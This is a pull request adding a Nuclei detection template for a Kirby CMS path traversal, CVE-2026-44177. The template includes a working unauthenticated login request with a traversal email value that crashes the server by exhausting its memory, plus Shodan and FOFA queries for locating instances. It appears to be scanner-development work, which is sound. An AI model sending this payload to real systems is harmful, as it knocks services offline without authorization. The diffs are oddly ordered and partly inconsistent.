### PR TITLE
Add CVE-2026-44177 template

### DIFF
--- a/http/cves/2026/CVE-2026-44177.yaml
+++ b/http/cves/2026/CVE-2026-44177.yaml
@@ -1,24 +1,11 @@
 id: CVE-2026-44177
 
 info:
-  name: Kirby CMS 5.3.0-5.4.0 - Unauthenticated Path Traversal via Auth API
+  name: Kirby CMS 5.3.0-5.4.0 - Path Traversal
   author: str4k3r
   severity: high
   description: |
-    Kirby CMS 5.3.0 through 5.4.0 lazily hydrates user objects from the
-    site/accounts directory by concatenating an unvalidated, request-supplied
-    user ID/email into a filesystem path. The unauthenticated /api/auth/login
-    endpoint passes the request's email field straight into
-    Users::hydrateElement() as this key, so an attacker can supply a
-    traversal sequence (e.g. "../..") instead of an email address. On a
-    default install this resolves the account directory to the site's own
-    document root and includes its index.php a second time from inside the
-    already-running application, causing uncontrolled recursion that
-    exhausts the PHP memory limit and crashes the request. A patched
-    instance rejects the same traversal value before any filesystem lookup
-    and returns the normal generic invalid-login response instead. Fixed in
-    5.4.1, which restricts the user ID to safe characters and adds a
-    containment check on the resolved path.
+    Kirby CMS versions 5.3.0 through 5.4.0 are vulnerable to a path traversal vulnerability via the /api/auth/login endpoint. An unauthenticated attacker may supply a specially crafted email value in the request body containing traversal sequences (such as "../.."), which the application concatenates directly into a filesystem path when hydrating user objects. This can result in the resolution of paths outside the intended accounts directory and may lead to the inclusion of unintended files such as index.php, causing a denial of service by exhausting memory limits. The issue is addressed in version 5.4.1 by properly validating and sanitizing the user-supplied input to prevent directory traversal.
   reference:
     - https://github.com/getkirby/kirby/security/advisories/GHSA-9hx7-c53c-v6x8
     - https://github.com/getkirby/kirby/releases/tag/5.4.1
@@ -33,26 +20,24 @@ info:
     max-request: 2
     product: kirby
     vendor: getkirby
-  tags: cve,cve2026,kirby,cms,lfi,traversal,unauth
+    shodan-query: http.favicon.hash:987600836
+    fofa-query: icon_hash="987600836"
+  tags: cve,cve2026,kirby,cms,lfi,traversal
 
 http:
   - raw:
       - |
         GET /panel/installation HTTP/1.1
         Host: {{Hostname}}
-      - |
-        GET /panel/installation HTTP/1.1
-        Host: {{Hostname}}
 
-    cookie-reuse: true
     extractors:
       - type: regex
         name: csrf
         part: body
-        internal: true
         group: 1
         regex:
           - '"csrf":"([a-f0-9]+)"'
+        internal: true
 
   - raw:
       - |
@@ -61,9 +46,8 @@ http:
         Content-Type: application/json
         X-CSRF: {{csrf}}
 
-        {"email":"../..","password":"x","long":false}
+        {"email":"../../","password":"x","long":false}
 
-    cookie-reuse: true
     matchers-condition: or
     matchers:
       - type: word
@@ -75,3 +59,5 @@ http:
         part: body
         words:
           - "Allowed memory size of"
+          - "bytes exhausted (tried to allocate"
+        condition: and

--- a/http/cves/2026/CVE-2026-44177.yaml
+++ b/http/cves/2026/CVE-2026-44177.yaml
@@ -1,0 +1,77 @@
+id: CVE-2026-44177
+
+info:
+  name: Kirby CMS 5.3.0-5.4.0 - Unauthenticated Path Traversal via Auth API
+  author: str4k3r
+  severity: high
+  description: |
+    Kirby CMS 5.3.0 through 5.4.0 lazily hydrates user objects from the
+    site/accounts directory by concatenating an unvalidated, request-supplied
+    user ID/email into a filesystem path. The unauthenticated /api/auth/login
+    endpoint passes the request's email field straight into
+    Users::hydrateElement() as this key, so an attacker can supply a
+    traversal sequence (e.g. "../..") instead of an email address. On a
+    default install this resolves the account directory to the site's own
+    document root and includes its index.php a second time from inside the
+    already-running application, causing uncontrolled recursion that
+    exhausts the PHP memory limit and crashes the request. A patched
+    instance rejects the same traversal value before any filesystem lookup
+    and returns the normal generic invalid-login response instead. Fixed in
+    5.4.1, which restricts the user ID to safe characters and adds a
+    containment check on the resolved path.
+  reference:
+    - https://github.com/getkirby/kirby/security/advisories/GHSA-9hx7-c53c-v6x8
+    - https://github.com/getkirby/kirby/releases/tag/5.4.1
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-44177
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
+    cvss-score: 8.8
+    cve-id: CVE-2026-44177
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    product: kirby
+    vendor: getkirby
+  tags: cve,cve2026,kirby,cms,lfi,traversal,unauth
+
+http:
+  - raw:
+      - |
+        GET /panel/installation HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /panel/installation HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    extractors:
+      - type: regex
+        name: csrf
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - '"csrf":"([a-f0-9]+)"'
+
+  - raw:
+      - |
+        POST /api/auth/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        X-CSRF: {{csrf}}
+
+        {"email":"../..","password":"x","long":false}
+
+    cookie-reuse: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "currently offline due to an unexpected error"
+
+      - type: word
+        part: body
+        words:
+          - "Allowed memory size of"


### PR DESCRIPTION
Adds a Nuclei template for **CVE-2026-44177**, an unauthenticated path traversal in Kirby CMS 5.3.0-5.4.0 (fixed in 5.4.1, GHSA-9hx7-c53c-v6x8).

The `email` field of the unauthenticated `POST /api/auth/login` endpoint is passed unvalidated into the lazy user-hydration lookup, which builds a filesystem path from it. A traversal value resolves the lookup outside `site/accounts` and back onto the site's own `index.php`, which then gets included a second time from inside the already-running app. On a default install this recurses until the PHP memory limit is hit and the request crashes; the patched version rejects the same value before any filesystem lookup and returns the normal generic invalid-login response.

Verified against the official pinned release tags (5.4.0 vulnerable / 5.4.1 fixed) built from a stock Composer plainkit skeleton, both on default configuration with no auth and no extra setup.